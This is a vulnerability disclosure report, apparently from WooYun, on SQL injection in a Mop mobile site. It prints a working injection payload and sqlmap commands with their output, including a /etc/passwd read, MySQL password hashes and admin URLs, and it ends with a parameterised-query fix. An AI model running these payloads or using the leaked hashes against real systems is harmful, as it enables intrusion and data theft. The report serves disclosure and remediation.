
Vulnerability summary (followers: 24)

Defect ID: wooyun-2014-079393

Title: SQL injection vulnerability in a Mop sub-site

Vendor: Mop

Author: BMa

Submitted: 2014-10-15 11:32

Fixed: 2014-11-29 11:34

Published: 2014-11-29 11:34

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2014-10-15: Details sent to the vendor; awaiting vendor handling
2014-10-15: Vendor confirmed; details disclosed to the vendor only
2014-10-25: Details disclosed to core white hats and relevant domain experts
2014-11-04: Details disclosed to ordinary white hats
2014-11-14: Details disclosed to intern white hats
2014-11-29: Details disclosed to the public

Summary:

A Mop sub-site has an SQL injection vulnerability; the database account has very broad privileges and multiple databases are affected.

Details:

Payload:

POST /viewmessage_new.jsp?log=1&mypage=viewmessage_new.jsp&ufstr=141325665400905&uid=2042281654&uidt=2084414119&version=5 HTTP/1.1
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://m.mop.com:80/
Cookie: mop3gVer=5; _mopwap_UID_T=2084414119; _mopwap_UVSTR=141325665400905; JSESSIONID=aaalWnp4J2Ntkf5YsQmKu; Hm_lpvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; Hm_lvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; _mopwapuuid=b940d441-563a-407e-82d8-7a1396e7bf55;
Host: m.mop.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/


Method:

root@kali:~# sqlmap -r '/root/Desktop/2'  --data="curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/"
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] n
Are you sure you want to continue? [y/N] y


Detailed output:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: email1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND 8260=8260 AND 'CKtN'='CKtN
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND SLEEP(5) AND 'lire'='lire
---
[15:01:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[15:01:13] [INFO] fetching current database
[15:01:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:01:13] [INFO] retrieved:
[15:01:15] [WARNING] reflective value(s) found and filtering out
mop
current database: 'mop'
[15:01:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 13 times
[15:01:29] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/m.mop.com'
available databases [8]:
[*] app
[*] focus
[*] information_schema
[*] mop
[*] mysql
[*] performance_schema
[*] test
[*] userlog
current user: 'wapuser@10.%'


Database: mop
[211 tables]
+-------------------------------------+
| Login_MP_Receive |
| UserBusiness_201101 |
| UserBusiness_201102 |
| UserBusiness_201103 |
| UserBusiness_201104 |
| UserBusiness_201105 |
| UserBusiness_201106 |
| UserBusiness_201107 |
| UserBusiness_201108 |
| UserBusiness_201109 |
| UserBusiness_201110 |
| UserBusiness_201111 |
| UserBusiness_201112 |
| UserBusiness_201201 |
| UserBusiness_201202 |
| UserBusiness_201203 |
| UserBusiness_201204 |
| UserBusiness_201205 |
| UserBusiness_201206 |
| UserBusiness_201207 |
| UserBusiness_201208 |
| UserBusiness_201209 |
| UserBusiness_201210 |
| UserBusiness_201211 |
| UserBusiness_201212 |
| UserBusiness_201301 |
| UserBusiness_201302 |
| UserBusiness_201303 |
| UserBusiness_201304 |
| UserBusiness_201305 |
| UserBusiness_201306 |
| UserBusiness_201307 |
| UserBusiness_201308 |
| UserBusiness_201309 |
| UserBusiness_201310 |
| UserBusiness_201311 |
| UserBusiness_201312 |
| UserBusiness_201401 |
| UserBusiness_201402 |
| UserBusiness_201403 |
| UserBusiness_201404 |
| UserBusiness_201405 |
| UserBusiness_201406 |
| UserBusiness_201407 |
| UserBusiness_201408 |
| UserBusiness_201409 |
| UserBusiness_201410 |
| UserOperate_201201 |
| UserOperate_201202 |
| UserOperate_201203 |
| UserOperate_201204 |
| UserOperate_201205 |
| UserOperate_201206 |
| UserOperate_201207 |
| UserOperate_201208 |
| UserOperate_201209 |
| UserOperate_201210 |
| UserOperate_201211 |
| UserOperate_201212 |
| UserOperate_201301 |
| UserOperate_201302 |
| UserOperate_201303 |
| UserOperate_201304 |
| UserOperate_201305 |
| UserOperate_201306 |
| UserOperate_201307 |
| UserOperate_201308 |
| UserOperate_201309 |
| UserOperate_201310 |
| UserOperate_201311 |
| UserOperate_201312 |
| UserOperate_201401 |
| UserOperate_201402 |
| UserOperate_201403 |
| UserOperate_201404 |
| UserOperate_201405 |
| UserOperate_201406 |
| UserOperate_201407 |
| UserOperate_201408 |
| UserOperate_201409 |
| UserOperate_201410 |
| 3g_edit_sublist2 |
| 3g_edit_sublist |
| 3g_hotclick_info |
| 3g_hotclick_statistic |
| 3g_huodong_view |
| 3g_huodong_views_syn_list |
| 3g_huodong_views |
| 3g_investigate1_detail |
| 3g_tjzq_list_hisbak |
| 3g_tjzq_list |
| 3g_topRegion |
| 3gpet_enter |
| 3gpet_mm_record |
| admin_Lefttree |
| admin_data_review |
| admin_operator_permission |
| article |
| article_info |
| audit_images |
| audit_images_20100720 |
| audit_images_process |
| audit_images_source |
| baidu_keywords |
| business_detail |
| business_detail_20100720 |
| business_text |
| checkin |
| client_statistics |
| day_receive_login_mp |
| day_receive_login_mpBK1105 |
| day_statistic_normal |
| email_record |
| hi_send_log |
| hot_column |
| hozom_bind |
| huati_table |
| huati_table_tbak |
| huati_table_wcup |
| huodong_table_3g |
| image_monitor_log |
| ipdata |
| keywords_2009 |
| login_times_patch |
| mobile_area |
| mobile_bind |
| mobile_bind_tmp |
| mobile_up_message |
| monthData |
| mp_limit |
| mp_limit_dzh2 |
| mp_tmp |
| mp_tmp2 |
| mp_tmp_ok |
| passport_delete_user |
| passport_delete_user_1 |
| passport_delete_user_tmp |
| postReplyStatistics |
| progress |
| purge_pic_upload3_postimg1 |
| quote_reply |
| quote_reply2 |
| recent_subject |
| refere_login_temp |
| refere_reg_temp |
| refere_statistics |
| refere_statistics_temp |
| referer_domain |
| reg_login_num |
| reg_login_num2 |
| reg_login_num_week |
| register_return_dzh |
| register_return_dzh2 |
| register_return_dzh_week |
| request_header_info |
| request_header_notwap |
| send_feed |
| shualiang |
| shualiang_group |
| stat_page_href |
| statistic_back_login |
| statistic_login_idlist |
| statistic_reg_convert |
| statistic_reg_idlist |
| statistic_source |
| statistics |
| statistics_new |
| stockReward |
| subject_key |
| temp_focus |
| tmp_2 |
| topic_subject |
| torch_application |
| torch_union |
| unionSubReward |
| unionSubRewardRec |
| union_login_total |
| url_counter |
| usermessage |
| usermessage0 |
| usermessage_info |
| uv_statistics |
| wap_auth_user |
| wap_auth_user_path |
| wap_auth_user_temp |
| wap_auto_login |
| wap_auto_login20110907 |
| wap_auto_login_path |
| wap_hotclick_statistic |
| wap_site_info |
| wap_site_linkOutStatistics |
| wap_site_linkOutStatistics_baksLink |
| wap_site_statistics |
| wap_system_prop |
| wap_time_statistic |
| wap_user_equip |
| wap_user_ext |
| wap_user_mobile |
| wap_user_prop |
| wap_user_set |
| wap_user_telnum |
| wl_mobile_statistics |
| wl_statirtics |
| wl_time_statistics |
| wl_time_statistics_backup20120221 |
| wl_time_statistics_bak120531 |
| wl_time_statistics_bak121026 |
| wl_uv_statistics |
| xn_connector |
| xn_reg |
| xn_reg_bak_091104 |
+-------------------------------------+


Database: mop
Table: wap_auth_user
[12 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| time | datetime |
| block_order | varchar(100) |
| block_show_num | varchar(100) |
| font_size | int(11) |
| login_key | varchar(200) |
| login_times | int(11) |
| mp | int(10) |
| show_num | int(11) |
| show_pic | int(11) |
| user_id | int(11) |
| user_name | varchar(100) |
| wc_show_num | int(11) |
+----------------+--------------+


Database privileges and scope:

database management system users privileges:
[*] %% (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
privilege: USAGE
[*] %beauty% [1]:
privilege: REPLICATION SLAVE
[*] %root% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] %slave% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] %wapuser% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE


select load_file('/etc/passwd');:    'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\nabrt:x:173:173::/etc/abrt:/sbin/nologin\nhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\narpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nuuidd:x:498:499:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nnscd:x:28:28:NSCD Daemon:/:/sbin/nologin\nmysql:x:497:498:MySQL server:/var/lib/mysql:/bin/bash\n'


Admin backend:

Backend: http://m.mop.com/admin/login.jsp
Database accounts: select user,password from mysql.user; [13]:
[*] beauty,
[*] wapuser,
[*] slave,
[*] wapuser,
[*] slave,
[*] wapuser,
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F
[*] root, *9DFF44DFF4007B348C4AC352751C6AAE5B562A8C
[*] wapuser, *2726FA9A20F4078869AB791D5D12DF114D62CAFD


System administrator entry point: http://m.mop.com/test/server_rsh.jsp
A shell could be obtained and the database dumped (neither was done; I did not go further).

Proof:

Screenshots 1.png through 8.png (images not reproduced here)

Remediation:

I often browse Mop myself; a gift would be nice.
1. Filter input properly in the application code
2. Restrict database account privileges
3. Restrict access to the admin backend
4. Restrict the system account, otherwise certain files can be read
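The report shows a JSP handler splicing the email1 form field into a MySQL query, so the quotes, comment markers and sleep() in the payload are parsed as SQL. The following is an added example, not code from the original report or from Mop, of what remediation item 1 looks like in JDBC for an endpoint of this shape: the unsafe concatenation is shown once for contrast, and the fixed handler binds email1 and curpage as parameters so the statement text never changes. The table and column names (usermessage, email, subject, sent_at), the page size and the email pattern are assumptions for illustration.

```java
// Added example (not the report's or Mop's code). Assumed schema: a table
// usermessage(id, email, subject, sent_at). Demonstrates remediation item 1:
// parameterised queries instead of string concatenation.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class MessageLookup {

    // Loose syntactic check on the address. This is a sanity filter only;
    // the real defence is the bound parameter below.
    private static final Pattern EMAIL =
        Pattern.compile("^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}$");
    private static final int PAGE_SIZE = 20;

    // BEFORE: the pattern behind the report. The request parameter becomes part
    // of the SQL text, so a single quote in it closes the string literal and
    // whatever follows is parsed as SQL. Kept only to contrast with the fix;
    // it returns the text and is never executed here.
    static String unsafeQuery(String email1, int curpage) {
        return "SELECT id, subject, sent_at FROM usermessage WHERE email = '" + email1 + "'"
             + " LIMIT " + ((curpage - 1) * PAGE_SIZE) + ", " + PAGE_SIZE;
    }

    // AFTER: a prepared statement. The SQL is a fixed string and email1 travels
    // to MySQL as a bound value, so quotes, comment markers and function calls
    // inside it are data, not syntax. curpage is parsed as an int before use.
    static List<String> findMessages(Connection db, String email1, String curpageRaw)
            throws SQLException {
        if (email1 == null || !EMAIL.matcher(email1).matches()) {
            throw new IllegalArgumentException("email1 rejected");
        }
        int curpage;
        try {
            curpage = Integer.parseInt(curpageRaw);
        } catch (NumberFormatException e) {
            curpage = 1;
        }
        if (curpage < 1) {
            curpage = 1;
        }

        String sql = "SELECT id, subject, sent_at FROM usermessage WHERE email = ? LIMIT ?, ?";
        List<String> rows = new ArrayList<>();
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setString(1, email1);
            ps.setInt(2, (curpage - 1) * PAGE_SIZE);
            ps.setInt(3, PAGE_SIZE);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    rows.add(rs.getInt("id") + "\t" + rs.getString("subject")
                           + "\t" + rs.getTimestamp("sent_at"));
                }
            }
        }
        return rows;
    }
}
```

In a servlet or JSP this is called as findMessages(conn, request.getParameter("email1"), request.getParameter("curpage")). The fix only removes the injection; items 2 and 4 still matter because the sqlmap output above shows the application account wapuser holding FILE, SUPER and SHUTDOWN, which is what turned a query bug into a read of /etc/passwd. The account an endpoint like this uses should hold nothing beyond SELECT, INSERT and UPDATE on the tables it actually touches, and the MySQL process should not run with a login shell on the host.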

Copyright notice: when reposting, credit the source: BMa@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Rank: 5

Confirmed: 2014-10-15 17:14

Vendor reply:

Thanks, many thanks!

Latest status:

None yet

